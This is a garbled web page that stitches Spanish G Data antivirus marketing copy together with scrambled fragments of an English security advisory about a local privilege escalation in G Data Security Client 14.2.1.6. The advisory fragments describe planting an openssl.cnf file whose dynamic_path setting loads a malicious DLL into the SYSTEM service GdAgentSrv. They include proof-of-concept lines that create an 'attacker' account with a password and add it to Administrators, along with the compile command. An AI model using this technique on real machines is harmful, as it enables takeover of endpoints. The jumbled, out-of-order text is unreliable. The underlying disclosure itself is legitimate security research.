Navegue sin preocupaciones: la mejor protección para banca, compras y correos electrónicos. Protéjase frente a estafas y robo de datos online. 06.2021: The issues was abused during a security check to overtake another client’s infrastructure. Benefíciese de máximas tasas de reconocimiento.After initial communication no further feedback. 11.2020: The issue was communicated again to G Data’s Sales Team in Austria.: The issue has been identified, documented and reported (ticket number CAS-730826-F7K4R9).Starting from the vulnerability is fixed Timeline Update to the latest available version – which happens automatically anyway. Full access to the affected endpoint has been gained.
During the boot process, the new admin user attacker will be added. To confirm this issue yourself install the G Data Security Client 14.2.1.6 and download the precompiled version of the exploit files.Īfter that, as a non-admin user, create the folder C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-141-static\ and place the previously downloaded files (openssl.cnf, bad_dll.dll) therein. This in turn causes the new administrator to be added to the system: Proof of Concept System("net localgroup Administrators attacker /add") Īfter the system is rebooted (or the GdAgentSrv process is restarted) the config file is parsed and the DLL loaded. System("net user attacker Batman42 /add") "C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" amd64
G data antivirus issues .dll#
In this example we use the DLLMain entry point to create a new administrative user attacker as soon as the DLL is loadedĬl.exe /D_USRDLL /D_WINDLL dll.cpp /link /DLL /OUT:bad_dll.dll Normal enduser permissions are sufficient for these actions. To do that we create the previously identified openssl.cnf file at the given path and abuse the dynamic_path option to specify a DLL of our choosing. Luckily for us, we can abuse OpenSSL’s extensibility to not only load TPM engines, but also to inject malicious code into the GdAgentSrv process. The underlying problem is, that the GdAgentSrv service (which is running as SYSTEM), tries to load its OpenSSL configuration from the non-existing path C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-141-static\openssl.cnf (newer versions load from C:\Jenkins\vcpkg-master\packages\openssl-windows_x86-static\openssl.cnf).
0 kommentar(er)
